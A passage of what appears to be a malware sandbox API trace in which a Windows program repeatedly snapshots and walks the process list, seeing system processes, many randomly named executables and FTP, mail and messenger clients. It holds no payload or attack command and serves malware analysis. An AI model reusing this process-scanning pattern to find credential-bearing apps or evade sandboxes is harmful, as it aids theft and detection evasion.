pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0262.252] CloseHandle (hObject=0x2338) returned 1 [0262.252] Sleep (dwMilliseconds=0x64) [0262.292] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0262.347] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.349] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.350] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.352] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.353] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.355] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.356] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.358] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0262.360] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0262.362] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.363] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.365] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0262.366] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.368] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.369] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.371] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.373] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.417] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.419] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.420] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0262.422] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0262.423] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0262.425] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0262.426] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.428] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0262.429] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0262.431] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0262.432] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0262.434] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0262.435] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0262.437] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.438] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.440] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0262.441] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.443] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.444] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0262.446] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0262.447] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0262.449] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0262.450] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0262.493] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0262.494] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0262.496] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0262.498] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0262.499] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0262.500] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0262.502] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0262.503] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0262.505] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0262.506] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0262.510] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0262.512] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0262.513] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0262.515] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0262.516] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0262.518] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0262.519] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0262.521] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0262.523] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0262.525] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0262.528] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0262.530] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0262.539] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0262.541] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0262.543] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0262.545] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0262.546] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0262.551] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0262.553] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0262.555] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0262.557] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0262.559] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0262.561] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0262.563] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0262.565] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0262.567] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0262.569] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0262.571] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0262.573] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0262.579] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0262.582] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0262.584] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0262.585] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: 